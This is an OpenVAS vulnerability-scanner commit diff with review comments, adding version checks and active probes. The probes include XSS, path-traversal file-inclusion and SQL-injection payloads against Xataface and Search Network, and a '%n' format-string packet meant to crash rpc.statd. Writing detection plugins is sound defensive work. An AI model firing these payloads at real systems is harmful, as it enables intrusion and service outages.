--- trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_opera_extented_validation_info_disc_vuln_win.nasl 17032 2011-09-09 17:11:11Z sep $
+#
+# Opera Extended Validation Information Disclosure Vulnerabilities (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802332);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-3388","CVE-2011-3389");
+  script_bugtraq_id(49388);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Opera Extended Validation Information Disclosure Vulnerabilities (Windows)");
+  desc = "
+  Overview: The host is installed with Opera and is prone to information
+  disclosure vulnerability.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to, an error when loading content from trusted
+  sources in an unspecified sequence that causes the address field and page
+  information dialog to contain security information based on the trusted site
+  and loading an insecure site to appear secure via unspecified actions related
+  to Extended Validation.
+
+  Impact:
+  Successful exploitation allows remote attackers to steal sensitive security
+  information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Opera version before 11.51
+
+  Fix: Upgrade to Opera version 11.51 or later.
+  For updates refer, http://www.opera.com/download/
+
+  References:
+  http://osvdb.org/74828
+  http://osvdb.org/show/osvdb/74829
+  http://secunia.com/advisories/45791
+  http://www.securitytracker.com/id?1025997
+  http://www.opera.com/support/kb/view/1000/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of Opera");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("secpod_opera_detection_win_900036.nasl");
+  script_require_keys("Opera/Win/Version");
+  exit(0);
+}
+
+include("version_func.inc");
+
+operaVer = get_kb_item("Opera/Win/Version");
+if(!operaVer){
+  exit(0);
+}
+
+# Check for opera version < 11.51
+if(version_is_less(version:operaVer, test_version:"11.51")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl 16936 2011-09-09 14:22:56Z sep $
+#
+# Pidgin Libpurple Protocol Plugins Denial of Service Vulnerabilities (Win)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802331);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2943", "CVE-2011-3184", "CVE-2011-3185");
+  script_bugtraq_id(49268);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Pidgin Libpurple Protocol Plugins Denial of Service Vulnerabilities (Win)");
+  desc = "
+  Overview: This host is installed with Pidgin and is prone to denial of
+  service vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to,
+  - An error in the IRC protocol plugin in libpurple when handling WHO
+    responses with special characters in the nicknames.
+  - An error in the MSN protocol plugin when handling HTTP 100 responses.
+  - Improper handling of 'file:// URI', allows to execute the file when user
+    clicks on a file:// URI in a received IM.
+
+  Impact:
+  Successful exploitation allows remote attackers to execute arbitrary code,
+  obtain sensitive information or cause a denial of service.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Pidgin versions prior to 2.10.0
+
+  Fix: Upgrade to Pidgin version 2.10.0 or later.
+  For updates refer, http://pidgin.im/download/windows/
+
+  References:
+  http://secunia.com/advisories/45663
+  http://pidgin.im/news/security/?id=53
+  http://pidgin.im/news/security/?id=54
+  http://pidgin.im/news/security/?id=55
+  http://securitytracker.com/id?1025961 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Pidgin");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Denial of Service");
+  script_dependencies("secpod_pidgin_detect_win.nasl");
+  script_require_keys("Pidgin/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get Pidgin Version from KB
+pidginVer = get_kb_item("Pidgin/Win/Ver");
+
+if(pidginVer != NULL)
+{
+  ## Check for Pidgin Versions Prior to 2.10.0
+  if(version_is_less(version:pidginVer, test_version:"2.10.0")){
+    security_hole(0);
+  }
+}
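Review bot: The script_name and script_family("Denial of Service") describe this purely as a DoS plugin, while the Impact paragraph claims remote code execution and the third Vulnerability Insight bullet describes a file:// URI being executed on click; either the title/family should be widened to match the documented impact, or the Impact text should be narrowed to what the check actually covers. The presence test `if(pidginVer != NULL)` also differs from the early-exit form `if(!pidginVer){ exit(0); }` that the sibling version-check plugins in this commit use after their description block; settling on one form keeps the post-description code uniform across the batch. A short comment on the `Pidgin/Win/Ver` key, e.g. `## KB key is populated by secpod_pidgin_detect_win.nasl`, would tie the script_require_keys call to the dependency for the next reader.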

Added: trunk/openvas-plugins/scripts/gb_search_network_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_search_network_xss_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_search_network_xss_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,108 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_search_network_xss_vuln.nasl 16584 2011-09-07 10:35:01Z sep $
+#
+# Search Network 'search.php' Cross Site Scripting Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801974);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49064);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Search Network 'search.php' Cross Site Scripting Vulnerability");
+  desc = "
+  Overview: This host is running Search Network and is prone to cross site
+  scripting vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to failure in the 'search.php' script to properly
+  sanitize user supplied input in 'action' and 'query' parameters.
+
+  Impact:
+  Successful exploitation could allow execution of scripts or actions
+  written by an attacker. In addition, an attacker may obtain authorisation
+  cookies that would allow him to gain unauthorised access to the application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Search Network version 2.0 and prior.
+
+  Fix: No solution or patch is available as on 07th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.searchnetworkhq.com/
+
+  References:
+  http://www.securityfocus.com/bid/49064/exploit
+  http://packetstormsecurity.org/files/view/103780/searchnetwork-xss.txt ";
+
+  script_description(desc);
+  script_summary("Check if Search Network is vulnerable to XSS");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("http_version.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Chek Host Supports PHP
+if(!can_host_php(port:port)) {
+  exit(0);
+}
+
+## Check for each possible path
+foreach dir (make_list("/sn", "/search_network", "/"))
+{
+  ## Send and Receive the response
+  req = http_get(item:string(dir,"/index.php"), port:port);
+  res = http_keepalive_send_recv(port:port,data:req);
+
+  ## Confirm the application
+  if("www.searchnetworkhq.com" >< res)
+  {
+    req = http_get(item:string(dir, '/index.php?searchType=Videos&query' +
+          '="<script>alert(document.cookie)<%2Fscript>'), port:port);
+
+    res = http_keepalive_send_recv(port:port, data:req);
+
+    ## Confirm exploit worked by checking the response
+    if('"<script>alert(document.cookie)</script>' >< res)
+    {
+      security_warning(port);
+      exit(0);
+    }
+  }
+}
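Review bot: The Vulnerability Insight names 'search.php' and the 'action' and 'query' parameters, but the probe in the foreach loop requests index.php with searchType=Videos&query=..., so the description and the check disagree on which script and parameters are tested; correct one of them, or add a comment above the second http_get explaining why index.php is the entry point used for the check. The directory list is hard-coded to "/sn", "/search_network" and "/", whereas the Xataface plugin added in the same commit also appends cgi_dirs(); including it here would cover the same non-default install paths. The fingerprint response is matched with `><` without first confirming it is non-NULL; a `if(!res) continue;` after the first http_keepalive_send_recv keeps the loop from matching against a dead connection.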

Modified: trunk/openvas-plugins/scripts/gb_thunderbird_detect_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_thunderbird_detect_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_thunderbird_detect_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -7,6 +7,9 @@
 # Authors:
 # Chandan S <schandan at secpod.com>
 #
+# Updated by: Madhuri D <dmadhuri at secpod.com> on 2011-09-08
+#    Added security_note to display the version of thunderbird
+#
 # Copyright:
 # Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net
 #
@@ -57,16 +60,17 @@
 }
 
 # Get ThunderBird Version from Registry
-birdVer = registry_get_sz(item:"CurrentVersion", 
+birdVer = registry_get_sz(item:"CurrentVersion",
                           key:"SOFTWARE\Mozilla\Mozilla Thunderbird");
-if(!birdVer){
-  exit(0);
-}
-
-if(!ereg(pattern:"1\.5[^.0-9]", string:birdVer))
+if(birdVer)
 {
-  birdVer = eregmatch(pattern:"[0-9.]+", string:birdVer);
-  set_kb_item(name:"Thunderbird/Win/Ver",value:birdVer[0]);
+  if(!ereg(pattern:"1\.5[^.0-9]", string:birdVer))
+  {
+    birdVer = eregmatch(pattern:"[0-9.]+", string:birdVer);
+    set_kb_item(name:"Thunderbird/Win/Ver",value:birdVer[0]);
+    security_note(data:"Mozilla Thunderbird version " + birdVer[0] +
+                         " was detected on the host");
+  }
   exit(0);
 }
 
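Review bot: The restructuring changes which cases reach the code below the hunk: before, a missing registry value exited and a version matching `1\.5` fell through past the closing brace, whereas now a missing value falls through and a 1.5 match hits the unconditional `exit(0)` inside `if(birdVer)`. If the code that follows handled the 1.5 case it is now unreachable, and if the fallthrough for a missing value is the intended new behaviour it deserves a comment such as `# No CurrentVersion value: fall back to the detection below`; the enclosing sequence continues outside the hunk, so I cannot confirm which was meant. The added security_note reads `birdVer[0]` without checking that eregmatch matched, which is the same pre-existing pattern as the set_kb_item call, but now two lines depend on it.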

Added: trunk/openvas-plugins/scripts/gb_xadataface_webauction_n_librariandb_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_xadataface_webauction_n_librariandb_mult_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_xadataface_webauction_n_librariandb_mult_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,156 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_xadataface_webauction_n_librariandb_mult_vuln.nasl 17038 2011-09-09 14:14:14Z sep $
+#
+# Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801981);
+  script_version("$Revision: 1.0$");
+  script_tag(name:"cvss_base", value:"6.4");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities");
+  desc = "
+  Overview: This host is running Xataface WebAuction/Librarian DB and is prone
+  multiple vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to  input passed to the,
+  - '-action' parameter in 'index.php' is not properly verified. This can be
+    exploited to read complete installation path.
+  - 'list&-table' and '-action' parameter in 'index.php' page is not properly
+    verified before being used in an SQL query. This can  be exploited to
+    manipulate SQL queries by injecting arbitrary SQL queries.
+  - '-action' and 'list&-table' parameter in 'index.php'  page is not properly
+    verified before it is returned to the user. This can be exploited to
+    execute arbitrary HTML and script code in a user's browser session in the
+    context of a vulnerable site.
+  - 'list&-lang' and '-table' parameter in 'index.php' page is not properly
+    verified before it is returned to the user. This can be exploited to
+    execute arbitrary HTML and script code in a user's browser session in the
+    context of a vulnerable site.
+  - 'list&-lang' parameter in 'index.php' is not properly verified before
+    using it to include files. This can be exploited to include arbitrary
+    files from external and local resources.
+
+  Impact:
+  Successful exploitation could allow an attacker to execute arbitrary HTML
+  code in a user's browser session in the context of a vulnerable application
+  or to manipulate SQL queries by injecting arbitrary SQL code or to include
+  arbitrary files from external and local resources.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Xataface WebAuction Version 0.3.6 and prior.
+  Xataface Librarian DB version 0.2 and prior.
+
+  Fix: No solution or patch is available as on 09th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://xataface.com/
+
+  References:
+  http://secpod.org/blog/?p=350
+  http://www.exploit-db.com/exploits/17813
+  http://secpod.org/advisories/SECPOD_Xataface_Webauction_Mult_Vuln.txt ";
+
+  script_description(desc);
+  script_summary("Determine multiple flaws in Xataface WebAuction/Librarian DB");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("http_version.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("host_details.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+if (!can_host_php(port:port)){
+  exit(0);
+}
+
+## check for each possible path
+foreach dir (make_list("/webauction", "/librariandb", "", cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item:string(dir,"/index.php"), port:port);
+  res = http_keepalive_send_recv(port:port,data:req);
+
+  ## Confirm the application
+  if('>WebAuction</' >< res || "Books - Dataface Application<" >< res)
+  {
+    ## Check for the local file inclusion
+    files = traversal_files();
+    foreach file (keys(files))
+    {
+      ## Construct exploit string
+      url = string(dir, "/index.php?-table=books&-action=browse_by_cat&-curs" +
+                   "or=0&-skip=0&-limit=30&-mode=list&-lang=../../../../../." +
+                   "./../../../", files[file],'%00');
+
+      ## Confirm exploit worked properly or not
+      if(http_vuln_check(port:port, url:url, pattern:file))
+      {
+        security_hole(port:port);
+        exit(0);
+      }
+    }
+
+    ## Check for the SQL injection
+    req = http_get(item:string(dir,"/index.php?-table='"), port:port);
+    res = http_keepalive_send_recv(port:port,data:req);
+
+    ## Check the SQL result
+    if("The mysql error returned was" >< res)
+    {
+      security_hole(port:port);
+      exit(0);
+    }
+
+    ## Check for the XSS
+    req = http_get(item:string(dir, '/index.php?-table=books&-action=browse_' +
+                   'by_cat&-cursor=0&-skip=0&-limit=30&-mode=list&-lang="<sc' +
+                   'ript>alert("OpenVAS-XSS-TEST")</script>'), port:port);
+
+    res = http_keepalive_send_recv(port:port,data:req);
+
+    ## Check the response
+    if('<script>alert("OpenVAS-XSS-TEST")</script>' >< res)
+    {
+      security_hole(port:port);
+      exit(0);
+    }
+  }
+}
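Review bot: `host_details.inc` and `version_func.inc` are included, but as far as the visible code shows nothing calls into them — the checks only use the HTTP helpers (get_http_port, can_host_php, http_get, http_keepalive_send_recv, traversal_files, http_vuln_check); drop the two unused includes, or add a comment if they are required for a transitive definition. The fingerprint matches two different products (`>WebAuction</` or `Books - Dataface Application<`), yet the LFI and XSS probes are both built with `-table=books`, which appears to be the Librarian DB table; a comment explaining that the same index.php front controller is expected to serve both, or choosing the table name per matched product, would make the intent clear to the next maintainer. Each probe's response is matched with `><` without a NULL check after http_keepalive_send_recv, so a dropped keep-alive connection silently skips the check rather than being noticed.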

Added: trunk/openvas-plugins/scripts/secpod_nfs_rpc_statd_mult_format_string_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_nfs_rpc_statd_mult_format_string_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/secpod_nfs_rpc_statd_mult_format_string_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,126 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_nfs_rpc_statd_mult_format_string_vuln.nasl 16455 2011-08-27 12:14:17 aug $
+#
+# Nfs-utils rpc.statd Multiple Remote Format String Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902725);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2000-0666", "CVE-2000-0800");
+  script_bugtraq_id(1480);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Nfs-utils rpc.statd Multiple Remote Format String Vulnerabilities");
+  desc = "
+  Overview: The host is running statd service and is prone to multiple remote
+  format string vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to errors in rpc.statd/kstatd daemons logging
+  system. A call to syslog in the program takes data directly from the remote
+  user, this data could include printf-style format specifiers.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code with
+  the privileges of the rpc.statd process, typically root.
+
+  Impact Level: System/Application
+
+  Fix: Upgrade to latest of nfs-utils version 0.1.9.1 or later,
+  For updates refer, http://sourceforge.net/projects/nfs/files/nfs-utils/
+
+  References:
+  http://www.cert.org/advisories/CA-2000-17.html
+  http://www.iss.net/security_center/reference/vuln/RPC_Statd_Format_Attack.htm
+  http://support.coresecurity.com/impact/exploits/191000d57f477b31f74df301b1d96722.html ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_summary("Check the presence of a RPC service");
+  script_category(ACT_ATTACK);
+  script_family("RPC");
+  script_dependencies("secpod_rpc_portmap.nasl");
+  script_require_keys("rpc/portmap");
+  exit(0);
+}
+
+include("misc_func.inc");
+
+RPC_PROG = "100024";
+
+## Get the rpc port, running statd service
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP);
+if(port)
+{
+  ## Check if udp port is alive by sending some data
+  req = raw_string(0x78, 0xE0, 0x80, 0x4D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x02, 0x00, 0x01, 0x86, 0xB8, 0x00, 0x00, 0x00, 0x01,
+                   0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
+                   0x00, 0x20, 0x3A, 0x0B, 0xB6, 0xB8, 0x00, 0x00, 0x00, 0x09,
+                   0x6C, 0x6F, 0x63, 0x61, 0x6C, 0x68, 0x6F, 0x73, 0x74, 0x00,
+                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x4E, 0x00, 0x00, 0x00);
+
+  ## open socket
+  soc = open_sock_udp(port);
+
+  ## send the request and get the response
+  send(socket:soc, data:req);
+  res = recv(socket:soc, length:4096);
+
+  if(res == NULL){
+    exit(0);
+  }
+
+  # rpc.statd is running. Construct the exploit containing '%n'
+  req = raw_string(0x42, 0x99, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x02, 0x00, 0x01, 0x86, 0xB8, 0x00, 0x00,
+                   0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+                   0x01, 0x00, 0x00, 0x00, 0x20, 0x3A, 0x0B, 0xB4, 0xB3,
+                   0x00, 0x00, 0x00, 0x09, 0x6C, 0x6F, 0x63, 0x61, 0x6C,
+                   0x68, 0x6F, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x00, 0x28, 0x6E, 0x25, 0x6E, 0x25, 0x6E,
+                   0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25,
+                   0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E,
+                   0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25,
+                   0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25);
+
+  ## send the crafted data
+  send(socket:soc, data:req);
+  res = recv(socket:soc, length:1024);
+
+  sleep(5);
+
+  ## Confirm vulnerability by checking response
+  if(!res){
+    security_hole(port:port, protocol:"udp");
+  }
+
+  ## Close the socket
+  close(soc);
+}
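Review bot: The vulnerability is confirmed by the service going silent after the crafted request (`if(!res){ security_hole(...) }`), i.e. the probe is expected to take down rpc.statd, yet the script is registered as ACT_ATTACK rather than ACT_DESTRUCTIVE_ATTACK; the destructive category ensures the check only runs when a scan explicitly permits service-crashing tests. A missing UDP reply is also a weak signal on its own — packet loss or a filter produces the same `!res` and thus a false positive — so consider re-sending the first liveness request after the `sleep(5)` and reporting only if that second probe gets no answer either. The result of `open_sock_udp(port)` is used without a NULL check before `send()`, and the early `exit(0)` after the liveness probe returns without `close(soc)`; `if(!soc){ exit(0); }` and a close on that path would tidy both.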


